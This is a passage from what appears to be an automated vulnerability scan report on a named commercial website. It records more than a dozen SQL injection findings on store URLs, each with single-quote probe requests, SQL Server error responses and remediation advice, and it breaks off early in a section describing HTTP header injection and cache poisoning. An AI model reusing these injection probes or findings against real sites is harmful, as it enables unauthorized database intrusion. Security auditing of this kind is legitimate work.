Date: Sun, 12 Dec 2010 00:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FFLKIDJBCMHDONGCPGCBJPDH; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FGLKIDJBDHIJAKFCEAJAPHNH; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/REPORT_SMARTPHONE_STRATEGIES.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GGLKIDJBFFGLGEIDHAGGJNLE; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPINTERNETTV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EPKKIDJBLIDPJEBNNIBLDPMC; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPINTERNETTV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GPKKIDJBGKOPFDLFDFDJDOEK; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMBAPPSTORE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NBLKIDJBNHGBOBFNGGJMBDFB; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMBAPPSTORE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ACLKIDJBELIPBAFOLDDBDKOM; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMBPAYMENT.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JCLKIDJBFFCGCCJPDPBNEOCP; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMBPAYMENT.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MCLKIDJBLMAIJFLLPOIEFFHL; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPMobileEnterpriseServices.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CDLKIDJBJKJDFEMJMDIPNNBJ; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPMobileEnterpriseServices.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EDLKIDJBFDJKFCPNANPKCMHE; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPPREPMOBSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DELKIDJBIHGFDACPGCMJLBKE; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPPREPMOBSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EELKIDJBMNKKLNNNJJOGMJCP; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/RPWiMAXandLTE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CFLKIDJBICMJLIHJHKEIKGPP; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/RPWiMAXandLTE.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=EFLKIDJBCBILODGLKBMCGBGF; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ame_100930.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=BJMKIDJBGCKOKCIKMODHDMKD; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ame_100930.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DJMKIDJBKJEEDCLDEJDBONIA; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ame_101117.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GILKIDJBCCNINELBFIFKENLC; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ame_101117.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JILKIDJBJCCBEGJIFPFOOBCD; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_ap_101105.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=APLKIDJBHGKMFLDAGFOPBCIL; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_ap_101105.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CPLKIDJBEGOOBELBNNJFJEDN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_eur_101025.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=IFMKIDJBOBBACJOLFGMCLHOO; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_eur_101025.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LFMKIDJBGFJMICBFCJEGCDNK; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101005.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FEMKIDJBEKNKELOCOLCEFOML; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101005.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MEMKIDJBAHHNMMNFPJGBJHBA; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101109.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=MHLKIDJBNLNHJOBFJIIHKKON; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101109.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NHLKIDJBHDNFFOJEBABLBNBE; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101118.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JGLKIDJBCIEIJIJKMAAHNJAH; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101118.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KGLKIDJBKGBDJGEFJNGGOGDG; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/ins_la_101124.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HELKIDJBCEPCMGLFIBJIODNP; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/ins_la_101124.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KELKIDJBOFNGFIAAAPJLNGJJ; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/shopping_cart.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PIKKIDJBMHKCHJPNDILBHLKB; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/shopping_cart.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AJKKIDJBDEKNOGBMMJNLCENO; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
2. HTTP header injection
There are 8 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
